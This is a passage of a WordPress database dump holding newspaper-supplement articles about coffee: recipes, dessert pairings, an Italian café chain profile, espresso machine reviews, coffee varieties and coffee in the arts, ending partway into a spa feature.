mascarpone</li>&#13;\n</ul><h3> Method-</h3>&#13;\n<p>Preheat the oven to 200°C/Gas 6. First, sift the flour and cocoa powder together. Whisk the eggs and sugar until firm and pale then fold in the flour and cocoa. Spread the mixture into a greased, lined Swiss roll tin or pastry tray, about 20cm x 40cm, and bake for 12-14 minutes or until springy to the touch. Make the coffee syrup by stirring the sugar into the hot coffee until melted.</p>&#13;\n<p>Dust a clean cloth with caster sugar. Turn the sponge out onto the cloth and remove the lining paper. Brush the sponge with coffee syrup, then cover and leave to cool for 10 minutes.</p>&#13;\n<p>Whisk the egg yolks, icing sugar and butter until creamed and pale. Dissolve the instant coffee in the espresso mix and add to the butter mixture with the mascarpone. Continue to whisk until smooth and light.</p>&#13;\n<p>Spread the coffee cream evenly on the sponge, then roll up tightly from the short edge. Cover well and refrigerate for at least two hours before slicing and serving.</p>&#13;\n<h3>Wines to match</h3>&#13;\n<p>Maury and Banyuls, sweet French reds from the Pyrénées, both have notes of chocolate and coffee so work well with desserts containing these flavours.</p>&#13;\n<p><em>Taken from Matching Food &amp; Wine by Michel Roux Jr, RRP £20, published by Weidenfeld &amp; Nicols.</em></p><div class=\"woo-sc-hr\"></div>&#13;\n<h3>Simple but posh bangers and mash</h3>&#13;\n<p><strong>Developed for readers by Antonin Bonnet</strong></p>&#13;\n<p><img class=\"alignleft size-full wp-image-1388\" title=\"9.2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/9.2.jpg\" alt=\"\" width=\"596\" height=\"360\" /></p>&#13;\n<h3> </h3>&#13;\n<h3>Ingredients </h3>&#13;\n<ul><li>Wild boar sausages</li>&#13;\n<li>Onion, chopped</li>&#13;\n<li>A few sprigs of rosemary</li>&#13;\n<li>Potatoes, peeled</li>&#13;\n<li>Mushrooms</li>&#13;\n<li>Butter, to cook</li>&#13;\n<li>Flat-leaf parsley leaves, chopped</li>&#13;\n<li>½ shallot, chopped</li>&#13;\n<li>1 garlic clove, crushed</li>&#13;\n<li>Salt</li>&#13;\n<li>Instant coffee</li>&#13;\n<li>White wine</li>&#13;\n<li>Stock</li>&#13;\n<li>Hispi cabbage, to serve</li>&#13;\n</ul><h3> Method-</h3>&#13;\n<p>Roast the wild boar sausages along with the chopped onion and a few sprigs of rosemary in a preheated oven.</p>&#13;\n<p>Boil the potatoes until cooked through. Meanwhile, make a persillade of mushrooms for a side dish by sautéing the mushrooms in butter, then adding the flat-leaf parsley, shallot and garlic clove.</p>&#13;\n<p>When the potatoes are boiled, put them through a ricer then return to the pan with butter and salt to taste. Work warm milk into the mash and then add a pinch of instant coffee. Blend this in to make a beige coloured mash.</p>&#13;\n<p>Take the cooked sausages from the roasting dish and add white wine and stock to make an onion gravy.</p>&#13;\n<p>Place the mash on plates with the sausages on top and gravy. Serve with the mushroom persillade and hispi cabbage (a buttery tasting variety) on the side.</p>&#13;\n</div>&#13;\n									</div>','Making a meal of coffee','1104','publish','open','open','','making-a-meal-of-coffee','','','2018-04-02 20:09:31','2018-04-02 20:09:31','',0,'http://westonspirit.org.uk/making-a-meal-of-coffee.asp',0,'post','',0),(55,1,'2015-06-17 05:09:24','2015-06-17 05:09:24','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">31 October 2016</span>&#13;\n        </p>&#13;\n                	<p>COPY AND DATE NEEDED</p>&#13;\n<p>Distributed with <em>The Guardian</em></p>&#13;\n<p><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=111031094933-7ad5c5e8f8f64f6688ea19f070cfee10&amp;docName=coffee&amp;username=Lyonsdown&amp;loadingInfoText=Coffee&amp;backgroundColor=FFF9B6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=111031094933-7ad5c5e8f8f64f6688ea19f070cfee10&amp;docName=coffee&amp;username=Lyonsdown&amp;loadingInfoText=Coffee&amp;backgroundColor=FFF9B6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object></p>&#13;\n									</div>','October 2011','COPY AND DATE NEEDED Distributed with The Guardian','publish','open','open','','october-2011','','','2018-04-02 20:09:30','2018-04-02 20:09:30','',0,'http://westonspirit.org.uk/october-2011.asp',0,'post','',0),(56,1,'2017-01-15 17:20:47','2017-01-15 17:20:47','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">2 October 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Pensions – Can you afford to retire?\" st_url=\"http://westonspirit.org.uk/2011/10/pensions/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Pensions – Can you afford to retire?\" st_url=\"http://westonspirit.org.uk/2011/10/pensions/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Pensions – Can you afford to retire?\" st_url=\"http://westonspirit.org.uk/2011/10/pensions/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Pensions – Can you afford to retire?\" st_url=\"http://westonspirit.org.uk/2011/10/pensions/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Pensions – Can you afford to retire?\" st_url=\"http://westonspirit.org.uk/2011/10/pensions/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                	<p>With £120 billion wiped off the value of pensions in the recent financial turmoil, a happy retirement increasingly remote for many of us. Our report helps readers approaching retirement navigate their way through the uncertainty. With careful financial planning, you can still be looking forward to the best years of your life.</p>&#13;\n<p>Distributed with <em>The Sunday Telegraph</em></p>&#13;\n<p><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=111117183713-c27e8c0b963d421aa3432852f712ecfd&amp;docName=pensions&amp;username=Lyonsdown&amp;loadingInfoText=Pensions&amp;backgroundColor=FFF9B6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=111117183713-c27e8c0b963d421aa3432852f712ecfd&amp;docName=pensions&amp;username=Lyonsdown&amp;loadingInfoText=Pensions&amp;backgroundColor=FFF9B6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object></p>&#13;\n									</div>','Pensions – Can you afford to retire?','67','publish','open','open','','pensions-can-you-afford-to-retire','','','2018-04-02 20:09:28','2018-04-02 20:09:28','',0,'http://westonspirit.org.uk/pensions-can-you-afford-to-retire.asp',0,'post','',0),(57,1,'2016-06-13 14:49:02','2016-06-13 14:49:02','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\"></span>&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Perfect partners\" st_url=\"http://westonspirit.org.uk/2011/10/perfect-partners/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Perfect partners\" st_url=\"http://westonspirit.org.uk/2011/10/perfect-partners/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Perfect partners\" st_url=\"http://westonspirit.org.uk/2011/10/perfect-partners/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Perfect partners\" st_url=\"http://westonspirit.org.uk/2011/10/perfect-partners/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Perfect partners\" st_url=\"http://westonspirit.org.uk/2011/10/perfect-partners/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Never mind matching wine to your meal – a careful coffee combination can ensure your dessert really is the perfect happy ending</h4>&#13;\n<p>Coffee can play as big a role as wine in food pairing, says head of coffee buying at Taylors of Harrogate Mike Riley – but mainly with desserts.</p>&#13;\n<p>Riley, who sources coffee from 25 countries and who might dip his tasting spoon into up to 200 cups of coffee a day at the Yorkshire-based roasters, has compiled this guide to matching coffees and cakes or desserts:</p>&#13;\n<h3>Rich chocolate flavours such as a heavy chocolate cake</h3>&#13;\n<p>Many people choose a heavy Java which is a darker roast with great length. It sits on the palate afterwards. However, I think that it is interesting to look at a high grown Kenyan arabica, which is lively with great complexity of flavour. It is lemony and zesty and makes an interesting contrast.</p>&#13;\n<h3>Apple crumble, raspberries or Eton mess</h3>&#13;\n<p>It’s interesting to set something heavy against these desserts. I’d go for an Indian or Sumatran coffee (which is fully roasted to bring out the chocolate flavours), or even a Java.</p>&#13;\n<h3>Lighter desserts and biscotti</h3>&#13;\n<p>Nutty coffees go well with sponge cakes, everyday nibbles and biscuits. I’d recommend a Peruvian or a Nicaraguan coffee.</p>&#13;\n<h3>Black or white? Milk or cream?</h3>&#13;\n<p>Never add warm milk to coffee. It has a flavour of its own, which masks that of the coffee. Cream is another thing I don’t like in coffee either. A black single origin coffee can stand on its own.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong><a title=\"www.taylorsofharrogate.co.uk\" href=\"http://www.taylorsofharrogate.co.uk/\" target=\"_blank\">www.taylorsofharrogate.co.uk</a></strong></em></p>&#13;\n									</div>','Perfect partners','265','publish','open','open','','perfect-partners','','','2018-04-02 20:09:27','2018-04-02 20:09:27','',0,'http://westonspirit.org.uk/perfect-partners.asp',0,'post','',0),(58,1,'2016-07-15 04:28:44','2016-07-15 04:28:44','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Recreating an Italian experience\" st_url=\"http://westonspirit.org.uk/2011/10/recreating-an-italian-experience/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Recreating an Italian experience\" st_url=\"http://westonspirit.org.uk/2011/10/recreating-an-italian-experience/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Recreating an Italian experience\" st_url=\"http://westonspirit.org.uk/2011/10/recreating-an-italian-experience/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Recreating an Italian experience\" st_url=\"http://westonspirit.org.uk/2011/10/recreating-an-italian-experience/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Recreating an Italian experience\" st_url=\"http://westonspirit.org.uk/2011/10/recreating-an-italian-experience/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>An espresso bar and deli chain at the heart of the community brings Italian authenticity to the UK – starting with its blend of coffee</h4>&#13;\n<p>Antonio Motisi, an Italian born and raised in Britain, is bringing the secrets of Italian coffee culture to the UK.</p>&#13;\n<p>“Few Britons understand coffee the way the Italians do,” says Motisi, co-founder of the growing chain of Caffé Fratelli espresso bars and delis.</p>&#13;\n<p>“A traditional Italian coffee drinker only drinks café latte or cappuccino at breakfast. The milk, which is a heavy protein, sets them up for the day. But later in the day they drink only espresso because it stimulates digestion,” explains Motisi.</p>&#13;\n<p><img class=\"size-full wp-image-1404 alignright\" title=\"3\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/3.jpg\" alt=\"\" width=\"300\" height=\"450\" />The Italians also match coffee to their meals, just as wine is matched to food. “At lunch they typically pair espresso with a stuffed panino (the Italian sandwich) or a pasta, and at dinner with a low-carb meal.</p><div class=\"woo-sc-quote\"><p>We serve only our own blend of espresso, based on a traditional Italian blend</p></div>&#13;\n<p>“No Italian would dream of drinking a cappuccino at the end of an evening meal, as some Britons do. It would be like having a bowl of cereal in the evening.”</p>&#13;\n<p>Caffé Fratelli’s mission to bring Italian authenticity to UK coffee drinkers starts with its blend of coffee.</p>&#13;\n<p>“We serve only our own blend of espresso, based on a traditional Italian blend which includes Robusta beans sourced from a farmers’ co-operative in El Salvador,” says Motisi.</p>&#13;\n<p>The beans are shipped to the company’s roasters near Genoa, then roasted and blended to produce a coffee with a smooth, nutty flavour. Including Robusta in the blend ensures the caffeine kick and produces a rich, thick brown crema – the brown surface foam considered the sign of the best espresso.</p>&#13;\n<p>Motisi and business partner Toni Moscolo – the man behind hair salons Toni &amp; Guy – are also committed to serving authentic Italian food.</p>&#13;\n<p>“Our lasagne is made in northern Italy and brought here by refrigerated transport. Many of the ingredients for the food that we prepare in-house every day are sourced from Italy and Sicily,” says Moscolo.</p>&#13;\n<p>Customers who love the food can buy genuine Mediterranean ingredients from the café’s deli shelves and continue the Caffé Fratelli experience at home.</p>&#13;\n<p>“Unlike many coffee shop chains, we have not adapted our beliefs about food and coffee to the UK. We are recreating a genuine Italian experience,” says Motisi.</p>&#13;\n<p>As 80,000 people visit a Caffé Fratelli espresso bar and deli each month – with plans to add to its current 12 – it is already a genuine Italian experience that many UK coffee lovers enjoy.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><strong><em><a title=\"www.caffefratelli.co.uk\" href=\"http://www.caffefratelli.co.uk/\" target=\"_blank\">www.caffefratelli.co.uk</a></em></strong></p>&#13;\n									</div>','Recreating an Italian experience','430','publish','open','open','','recreating-an-italian-experience','','','2018-04-02 20:09:25','2018-04-02 20:09:25','',0,'http://westonspirit.org.uk/recreating-an-italian-experience.asp',0,'post','',0),(59,1,'2014-06-23 23:59:57','2014-06-23 23:59:57','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Rise of the machines\" st_url=\"http://westonspirit.org.uk/2011/10/rise-of-the-machines/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Rise of the machines\" st_url=\"http://westonspirit.org.uk/2011/10/rise-of-the-machines/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Rise of the machines\" st_url=\"http://westonspirit.org.uk/2011/10/rise-of-the-machines/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Rise of the machines\" st_url=\"http://westonspirit.org.uk/2011/10/rise-of-the-machines/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Rise of the machines\" st_url=\"http://westonspirit.org.uk/2011/10/rise-of-the-machines/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>The growth in the UK coffee market has generated an abundance of gizmos and machines to help the hardened caffeine imbiber brew that perfect cup. In the interests of good taste and stylish kitchens, the Coffee team has tested some of the domestic machines that have recently come on to the market</h4>&#13;\n<p><img class=\"alignright size-full wp-image-1381\" title=\"8.1\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/8.1.jpg\" alt=\"\" width=\"210\" height=\"274\" /></p>&#13;\n<h3>Dualit espressivo</h3>&#13;\n<p>What a neat machine, available in classy chrome or cream. The Dualit espressivo takes both ground coffee and coffee pods and comes with very clear, easy to follow instructions. However, it takes a long time to make a cup of coffee due to the priming process, which involves putting a mug of hot water through the system before each coffee. We tested two separate machines and both water tanks leaked. Try before you buy.</p>&#13;\n<h3>Kitchen Aid – Artisan espresso machine</h3>&#13;\n<p><img class=\"alignleft size-full wp-image-1382\" title=\"8.2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/8.2.jpg\" alt=\"\" width=\"210\" height=\"253\" />The generously sized machine comes with a range of attachments and boasts a double boiler – one for water and one for milk. Unfortunately, the instructions were inscrutable and, despite seeking help from Kitchen Aid’s customer service (no one rang back) – we were unable to set it up. Make sure you get a demonstration.</p>&#13;\n<h3>De’Longhi – Prima Donna</h3>&#13;\n<p><img class=\"alignright size-full wp-image-1383\" title=\"8.3\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/8.3.jpg\" alt=\"\" width=\"210\" height=\"276\" />Perfect for a large, modern kitchen – or possibly a space station – with its muted chrome exterior and digital display screens. From caffe latte to cappuccino, and macchiato to just plain latte, this machine does it all at the press of a button. The instructions take a little getting used to, but stick with it.</p>&#13;\n<h3>Fracino Piccino</h3>&#13;\n<p><img class=\"alignleft size-full wp-image-1384\" title=\"8.4\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/8.4.jpg\" alt=\"\" width=\"210\" height=\"270\" />Another sleek machine and beautiful in black and chrome. It took a bit of time to set up but the instructions were super clear. Simpler than the other machines we tested and worked at the touch of a button.</p>&#13;\n<p>The only downside was it appears only to take cups or small mugs – so you might have to keep going back for more. Good to go.</p>&#13;\n									</div>','Rise of the machines','317','publish','open','open','','rise-of-the-machines','','','2018-04-02 20:09:24','2018-04-02 20:09:24','',0,'http://westonspirit.org.uk/rise-of-the-machines.asp',0,'post','',0),(61,1,'2018-01-31 01:18:38','2018-01-31 01:18:38','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> gstroud\" title=\"Posts by Gemma Stroud\" rel=\"author\"&gt;Gemma Stroud</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Something’s brewing\" st_url=\"http://westonspirit.org.uk/2011/10/something%e2%80%99s-brewing/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Something’s brewing\" st_url=\"http://westonspirit.org.uk/2011/10/something%e2%80%99s-brewing/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Something’s brewing\" st_url=\"http://westonspirit.org.uk/2011/10/something%e2%80%99s-brewing/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Something’s brewing\" st_url=\"http://westonspirit.org.uk/2011/10/something%e2%80%99s-brewing/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Something’s brewing\" st_url=\"http://westonspirit.org.uk/2011/10/something%e2%80%99s-brewing/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>When it comes to coffee, there are varieties to suit all tastes – and all pockets</h4>&#13;\n<p>Whether you take yours short and black or skinny with a shot of caramel, coffee varieties are becoming as vast as the industry itself. Coffee is no longer just coffee. But what do all those fancy names actually mean?</p>&#13;\n<p>The two main commercial coffee beans are arabica and robusta. Arabica, which is grown at higher altitudes, is regarded as a better quality bean, according to the International Coffee Organisation (ICO).</p>&#13;\n<p>“The arabica is a delicate flower, literally and metaphorically, and this is reflected in the price,” says an ICO spokesman. “But coffee is very much like wine and preference is subjective and dependent on palate.”</p>&#13;\n<p>Growing conditions also play a part in flavour, says executive director of the British Coffee Association (BCA) Dr Euan Paul: “Some of the most popular coffees are from arabica beans, but have been grown in different climates and soils which impacts on their overall taste.”</p>&#13;\n<p></p><div id=\"attachment_1407\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1407\" title=\"Production Of The World\'s Most Expensive Coffee Thrives In Indonesia\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/4.1.jpg\" alt=\"\" width=\"596\" height=\"397\" /><p class=\"wp-caption-text\">Exclusive: Kopi Luwak coffee in production</p></div>&#13;\n<p>Kenyan, Colombian and Java coffee are all arabica varieties. Kenyan coffee has a strong, bold taste with a mellow after-taste, whereas Colombian coffee is intensely aromatic with a heavy body and bright acidity. The strong, black, very sweet Indonesian Java coffee became so popular that “java” is a slang term for coffee in the US.</p>&#13;\n<p>But as popularity of coffee has grown, so too has the price tag. Jamaican Blue Mountain coffee is seen as the champagne of the coffee world with its mild flavour and lack of bitterness and carries a globally protected certification mark.</p>&#13;\n<p>And the lucrative market for exclusive coffees has extended to monkey business. Quite literally. Kopi Luwak is a gourmet coffee made from coffee beans that have passed through the digestive system of the palm civet, a breed of Indonesian monkey.</p>&#13;\n<p>A spokesperson for coffee company Douwe Egberts says people will always be prepared to pay more for something that’s different. “Ultimately, producers are capitalising on their exclusivity. Often coffees are blends but you can buy single-origin coffees and, if you’re willing to pay the price, microlot coffees – beans harvested from one field in one day.</p>&#13;\n<p>“Genetic oddities such as peaberry coffees – where the beans have not split in two inside the cherry fruit – are also sold at premium price even though theoretically they shouldn’t taste any different.”</p>&#13;\n<p>According to the BCA’s Paul, there is no such thing as bad coffee, as quality controls are vigorous. “That’s when it becomes a question of preference. It all depends on what you want from your coffee and, for some people, that’s cheap vending machine gloop.”</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h3>A GRAIN OF TRUTH </h3>&#13;\n<h4>TV presenter and journalist Piers Hernu:</h4>&#13;\n<p><img class=\"alignright size-thumbnail wp-image-1406\" title=\"4.3\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/4.3-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" />My standard coffee order is a latte with one sugar, unless I’m at home and feeling lazy. Then it’s an instant.</p>&#13;\n<p>My perfect cup of coffee was on my honeymoon recently in Lefkada, Greece. There was a little coffee shop that sold wonderfully indulgent, strong coffee.</p>&#13;\n<p>My top coffee memory was popping round to Pete Doherty’s recently and having coffee in a blue, chipped, plastic mug. Not very rock ‘n’ roll. He didn’t even have milk or sugar, but the sentiment was there.</p><div class=\"woo-sc-hr\"></div>&#13;\n<h4>Actress and singer Janie Dee, who will be starring in Michael Frayn’s Noises Off at the Old Vic from 3 December:</h4>&#13;\n<p><img class=\"alignleft size-thumbnail wp-image-1408\" title=\"4.4\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/4.4-e1326371639840-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" />My favourite coffee is a frothy cappuccino. Where I can, I always go Fairtrade. My perfect cup of coffee was in Rome. That’s where I went from being indifferent about coffee to completely falling in love with it.</p>&#13;\n<p>My top coffee memory is drinking three strong espressos to get me through a recital with an Italian orchestra. I’d been partying hard and was exhausted. I couldn’t sleep for the next two days but I sang like a lark that night.</p>&#13;\n</div>&#13;\n									</div>','Something’s brewing','637','publish','open','open','','somethings-brewing','','','2018-04-02 20:09:22','2018-04-02 20:09:22','',0,'http://westonspirit.org.uk/somethings-brewing.asp',0,'post','',0),(62,1,'2014-12-09 04:57:58','2014-12-09 04:57:58','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">28 October 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> llightfoot\" title=\"Posts by Liz Lightfoot\" rel=\"author\"&gt;Liz Lightfoot</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Thinkers and drinkers\" st_url=\"http://westonspirit.org.uk/2011/10/thinkers-and-drinkers/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Thinkers and drinkers\" st_url=\"http://westonspirit.org.uk/2011/10/thinkers-and-drinkers/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Thinkers and drinkers\" st_url=\"http://westonspirit.org.uk/2011/10/thinkers-and-drinkers/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Thinkers and drinkers\" st_url=\"http://westonspirit.org.uk/2011/10/thinkers-and-drinkers/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Thinkers and drinkers\" st_url=\"http://westonspirit.org.uk/2011/10/thinkers-and-drinkers/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                	<h4> If you think coffee is simply something to perk us up in the morning think again. It has inspired some great artists to new heights of creativity</h4>&#13;\n<p>A link between coffee and the arts? Surely not. Coffee is for doctors and train drivers and City brokers who need to keep going in possession of their faculties. Coffee is for students, for friends meeting up, for breakfast, for sobering up after a night to remember.</p>&#13;\n<p>There are some mentions of coffee in literature, of course. In George Eliot’s The Mill on the Floss there was a scene on the boat where Maggie and Stephen “drank their cup of coffee together and walked about the deck”. Not very interesting</p>&#13;\n<p>And in Jane Austen’s Emma does Miss Bates drink coffee? Of course not: “No coffee, I thank you, for me – never take coffee – a little tea if you please.”</p>&#13;\n<p></p><div id=\"attachment_1372\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1372\" title=\"Small street cafe in Paris\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/10/6.jpg\" alt=\"\" width=\"596\" height=\"399\" /><p class=\"wp-caption-text\">Inspiring : Paris coffee houses</p></div>&#13;\n<p>Not quite the stuff that great literature is made of, but it’s not just about writing. Some Thai artists use coffee as paint – and it took artist Pornchai Lerthammasiri six years to master the right texture of coffee and water. Then there’s Bach’s Coffee Cantata…</p>&#13;\n<p>In fact, great artists, writers and composers may have been inspired by the beverage in the coffee houses of Paris, Vienna or Leipzig. Take Café Procope in Paris’s 6th arrondissement, which claims to be the oldest restaurant to have been in continuous operation in the city. It attracted all manner of men of letters – Rousseau, Robespierre, Alfred de Musset, George Sand and, of course, Voltaire who, it is claimed, drank at least 40 cups of coffee a day, mixing it with chocolate.</p>&#13;\n<p>In Vienna, writers used cafés to meet and exchange ideas in the 19th and 20th centuries and even composed their literature at the tables, consuming vast amounts of coffee as they wrote. Among those who became known as “the coffee house poets” were Arthur Schnitzler, Friedrich Torberg and Peter Altenberg, who had his mail delivered to the Café Central.</p>&#13;\n<p>But it has to be Johann Sebastian Bach’s decision to write a mini opera on the subject that is the ultimate artistic tribute to coffee. Bach, director of music for the principal Lutheran churches in Leipzig, was also the director of the Collegium Musicum, a society of student musicians who performed weekly at Zimmerman’s coffeehouse.</p>&#13;\n<p>Now that must elevate coffee above the humble tea, beer or vin de table. They cannot claim such an impact on Europe’s artists, writers and musicians. Or can they?</p>&#13;\n									</div>','Thinkers and drinkers','419','publish','open','open','','thinkers-and-drinkers','','','2018-04-02 20:09:21','2018-04-02 20:09:21','',0,'http://westonspirit.org.uk/thinkers-and-drinkers.asp',0,'post','',0),(63,1,'2014-07-06 20:42:26','2014-07-06 20:42:26','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">22 November 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> gstroud\" title=\"Posts by Gemma Stroud\" rel=\"author\"&gt;Gemma Stroud</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Soaking up the atmosphere\" st_url=\"http://westonspirit.org.uk/2011/11/971/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Soaking up the atmosphere\" st_url=\"http://westonspirit.org.uk/2011/11/971/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Soaking up the atmosphere\" st_url=\"http://westonspirit.org.uk/2011/11/971/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Soaking up the atmosphere\" st_url=\"http://westonspirit.org.uk/2011/11/971/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Soaking up the atmosphere\" st_url=\"http://westonspirit.org.uk/2011/11/971/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Help soothe away the aches and pains of the winter months by treating yourself to a spa experience</h4>&#13;\n<h3><strong>Smooth moves</strong></h3>&#13;\n<p>Champneys Age Excellence range of skincare products and treatments has been designed for mature skin and aims to improve elasticity and skin tone, and target blemishes. The products contain Tetrapeptide-21, the latest beauty buzz product that is said to minimise the appearance of wrinkles and reduce skin roughness.</p>&#13;\n<p>Promising to leave you feeling fabulous, Champneys pampering Ultimate Age Excellence Facial (85 minutes – £90) includes a relaxing hot stone massage for the face and shoulders using techniques to improve muscle and skin tone.</p>&#13;\n<p>The treatment aims to leave your skin feeling smoother and plumper by boosting blood flow.</p>&#13;\n<p>To find your nearest Champneys spa, visit <strong><em><a title=\"www.champneys.co.uk\" href=\"http://www.champneys.co.uk/\" target=\"_blank\">www.champneys.co.uk</a></em><div class=\"woo-sc-hr\"></div></strong></p>&#13;\n<h3><strong>Turn back time</strong></h3>&#13;\n<p><img class=\"alignright size-medium wp-image-1058\" title=\"soaking up the atmostphere 2\" src=\"/wp-content/uploads/2011/11/soaking-up-the-atmostphere-2-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Relax and recharge this season at the beautiful Ragdale Hall, an award-winning thermal spa in the Leicestershire countryside. Its three night Time For Me packages are designed to help target your needs and body hang-ups.</p>&#13;\n<p>Try the Timeless Me package to help revive and revitalise tired skin and give you an all-over body boost.</p>&#13;\n<p>Ragdale also offers healthy eating demonstrations and style and lingerie advice. The 